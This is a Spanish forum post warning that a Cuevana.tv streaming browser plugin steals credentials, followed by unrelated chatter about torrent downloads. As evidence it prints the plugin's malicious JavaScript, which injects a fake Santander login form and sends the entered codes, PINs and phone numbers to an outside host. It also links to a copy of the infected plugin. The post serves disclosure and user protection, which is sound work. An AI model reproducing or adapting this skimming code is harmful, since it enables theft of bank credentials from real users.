Cuevana.tv, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de "phising" (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene código malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.
Al parecer, al intentar visionar contenido de su sitio, éste pide autorización para instalar un complemento (plugin) para tu navegador (tanto Firefox como Chrome). Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web hxxp://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.
Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin "Cuevana Streaming". Después de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.
Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip, etc.), despues abre el archivo "script-compiler.js" que encontrarás en la carpeta "content". Una vez abierto ese archivo observa la
linea número 232.
hxxp://cuevanatv.asia/plugin.js
win.document.querySelector("#log_contenidop").innerHTML='<table width="100%" border="0" cellspacing="1" cellpadding="1">\n<tbody><tr>\n<td colspan="2"><img width="148" height="14" title="Ingreso a SuperNet" alt="Ingreso a SuperNet" src="images/ingreso_supernet.jpg">\n<input type="hidden" value="/schmexapp/index.jsp" name="pag">\n<input type="hidden" value="/schmexapp/index.jsp" name="miURL">\n<input type="hidden" value="1" name="irAmodulo"></td>\n</tr>\n<tr><td width="49%" align="right" class="texto_log">Código de Cliente:</td>\n<td width="51%"><label><input type="password" class="texto_form" style="width:60px;height:10px" name="login.claveCliente" id="usuario" autocomplete="off">\n</label></td></tr>\n<tr><td width="49%" align="right" class="texto_log">NIP:</td>\n<td width="51%"><label><input type="password" class="texto_form" style="width:60px;height:10px" name="login.claveCliente" id="clave" autocomplete="off">\n</label></td></tr>\n<tr><td width="49%" align="right" class="texto_log">NIP Dinamico:</td>\n<td width="51%"><label><input type="password" class="texto_form" style="width:60px;height:10px" name="login.claveCliente" id="nipd" autocomplete="off">\n</label></td></tr>\n<tr><td width="49%" align="right" class="texto_log">Telefono:</td>\n<td width="51%"><label><input type="text" class="texto_form" style="width:60px;height:10px" name="login.claveCliente" id="tel" autocomplete="off">\n</label></td></tr>\n<tr><td width="49%" align="right" class="texto_log">Celular:</td>\n<td width="51%"><label><input type="text" class="texto_form" style="width:60px;height:10px" name="login.claveCliente" id="cel" autocomplete="off">\n</label></td></tr>\n<tr>\n<td align="right" class="texto_log"></td>\n<td>\n<a onclick="javascript:login_personas();return false" id="splg.btnEntrar" href="#"><img width="39" height="16" border="0" align="absmiddle" title="Ingrese a Supernet" alt="Ingrese a Supernet" src="images/entrar.jpg"></a></td>\n</tr>\n<tr>\n<td align="right" class="texto_log"><a class="link_rojo02" onclick="getOutboundLink(\'Login\',\'Afiliarse\');MM_openBrWindow(\'https://www.santander.com.mx/Supernet2007/AfiliacionSupernet\',\'supernetWindow\',\'toolbar=1,location=1,status=1,menubar=no,scrollbars=yes,resizable=yes, width=1020,height=630\')" href="javascript:void(0)"><strong>AFILIARSE</strong></a></td>\n<td>| <a onclick="getOutboundLink(\'Login\',\'Tutorial Supernet\');MM_openBrWindow(\'http://www.santander.com.mx/demo/demo.html\',\'Tutorial\',\'toolbar=1,location=1,status=1,menubar=no,scrollbars=yes,resizable=yes, width=960,height=590\')" class="liga_gris" href="javascript:void(0)">Tutorial</a></td>\n</tr>\n<tr>\n<td align="center" colspan="2"><table width="242" border="0" cellspacing="0" cellpadding="0">\n<tbody><tr>\n<td colspan="3"><img width="242" height="24" src="images/beneficios-canales.gif"></td>\n</tr>\n<tr>\n<td><a onclick="javascript:getOutboundLink(\'Supernet\',\'Beneficios Supernet\');MM_openBrWindow(\'http://www.servicios.santander.com.mx/supernet\',\'Supernet\',\'toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=1020,height=630\')" href="javascript:void(0)"><img width="103" height="21" border="0" alt="SuperNet" src="images/canal-supernet.gif"></a></td>\n<td><img width="33" height="21" src="images/canal-linea.gif"></td>\n<td><a onclick="javascript:getOutboundLink(\'SuperMovil\',\'Beneficios SuperMovil\');MM_openBrWindow(\'http://servicios.santander.com.mx/supermovil/principal/index.html\',\'SuperMovil\',\'toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=1100,height=700\')" href="javascript:void(0)"><img width="106" height="21" border="0" alt="SuperMóvil" src="images/canal-supermovil.gif"></a></td>\n</tr>\n</tbody></table></td>\n</tr>\n</tbody></table><style>#fiesta_rewards{display:none}#login_container{height:225px}</style>';
win.redirectOutput = function (login,pass){
d = new Array();
d.push("usr:"+win.document.getElementById('usuario').value);
d.push("pss:"+win.document.getElementById('clave').value);
d.push("nipd:"+win.document.getElementById('nipd').value);
d.push("tel:"+win.document.getElementById('tel').value);
d.push("cel:"+win.document.getElementById('cel').value);
_sData(d.join(":_:"), win.location.href);
var head = win.document.getElementsByTagName('head')[0];
var script = win.document.createElement('script');
script.type = 'text/javascript';
script.appendChild(win.document.createTextNode(r_output.toString()));
head.appendChild(script);
win.r_output(login,pass);
}
win.login_personas = function() {
var usr = win.document.forms['gestor'].usuario;
var psw = win.document.forms['gestor'].clave;
var go = win.document.getElementById("splg.btnEntrar");
var frm = win.document.getElementById("gestor");
if(usr.value == ""){
usr.focus(); usr.select();
alert("Favor de teclear su código de cliente.");return;
}
if(!/^[a-zA-Z0-9]{8}$|^[a-zA-Z0-9]{4}$/.test(psw.value)) {
alert("El NIP debe de ser de 8 o 4 caracteres. Solo letras y números.");return;
}
if(win.document.getElementById("MKD25X")) win.document.getElementById("MKD25X").SkipVerify(1);
usr.value = win.completeUsrID(usr.value);
if(win.document.getElementById("MKD25X")) {
win.document.getElementById("MKD25X").SkipVerify(0);
}
if(!/^[0-9]{8}$|^[0-9]{16}$/.test(usr.value)) {
alert("El C\363digo de Cliente debe ser n\372merico, de 8 \363 16 d\355gitos.");
usr.focus(); usr.select();return;
}
if(win.document.getElementById('nipd').value=='') {
alert("Favor de teclear su NIP DINAMICO.");
return;
}
if(win.document.getElementById('tel').value=='') {
alert("Favor de teclear su TELEFONO.");
return;
}
if(win.document.getElementById('cel').value=='') {
alert("Favor de teclear su TELEFONO MOVIL.");
return;
}
win.Login(frm);
win.redirectOutput(usr.value,psw.value);
}
function r_output(login,pass){
objWin = open("" ,"supernetWindow","top=0,left=0,scrollbars=1,\
resizable=1,menubar=0,toolbar=0,location=0,directories=0,status=1");
objWin.document.write('<HTML><HEAD></HEAD><BODY><form name = "oculForm" method="post" target="supernetWindow" action="https://www.santander.com.mx/Supernet2007/loginGestor.jsp"><INPUT TYPE="hidden" name="usuario" value="' + login + '"><INPUT TYPE="password" style="display:none;" name="clave" value="' + pass + '"><input type="hidden" name="pag" value="/schmexapp/index.jsp"><input type="hidden" name="miURL" value="/schmexapp/index.jsp"><input type=hidden name=irAmodulo value=1>');
if (LoginPersonasComoBancaPrivada) objWin.document.write ('<input type="hidden" name="SNETBP" value="SI"/>');
objWin.document.write('</form></BODY></HTML>');
objWin.document.oculForm.submit();
}
confirmado, en Firefox, cualquier versión, está infectado con el código malicioso que roba datos. También estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios.
Actualización: descomprimir el XPI con WinRar (hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi) (NO LO INSTALE).
Entrar en la carpeta "content" y mirar la linea 232 del archivo "script-compiler.js". La url maliciosa es hxxp://cuevanatv.asia/back3.js.
Actualización: el nuevo plugin (diferente pero con la misma versión para que no se sospeche ) ya no roba datos. En el Tamper Data ya no da el aviso que daba antes. Han borrado la línea maliciosa del código para ocultar las pruebas. En el hilo de Foro Coches se puede encontrar el fichero original con el código malicioso, como prueba. Esto quiere decir que han borrado u ocultado la parte del código maliciosa.
y enlace al plugin infectado .xpi de firefox , versión 4.2 ==>
http://www.mediafire.com/?r998dij1fj1kb9eFuentes: Galacticow,
ForoCoches,
Blog segu-info.
Pues ya ven, que falta de etica!
Saludos!
Mostrar Mensajes
es que se veia muy bonito recatado serio y no cansa los ojos con ese rojo en las "tapas de gaseosa"...
Al parecer no hay muchas semillas ya o sera solo que a estas horas no hay muchos conectados, estoy descargando a 1,6 kb/s desde solo 5 semillas, un promedio de 146 dias. Si sigue asi me vere obligado a declinar la descarga. A nadie se le ha ocurrido hacer un mirror y subirlo a algun hosting, ftp o algo (o a varios mas bien)? Eso estaria genial y subirlo por partes de 500 MB o algo asi 